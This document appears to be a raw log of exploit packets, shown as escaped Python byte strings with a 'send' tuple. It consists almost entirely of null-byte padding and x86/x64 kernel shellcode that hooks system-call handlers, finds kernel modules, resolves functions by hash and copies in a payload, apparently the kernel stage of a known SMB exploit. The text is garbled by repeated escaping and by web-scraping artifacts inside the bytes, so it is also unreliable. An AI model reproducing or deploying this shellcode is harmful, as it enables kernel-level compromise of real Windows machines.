b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\
\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 11, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\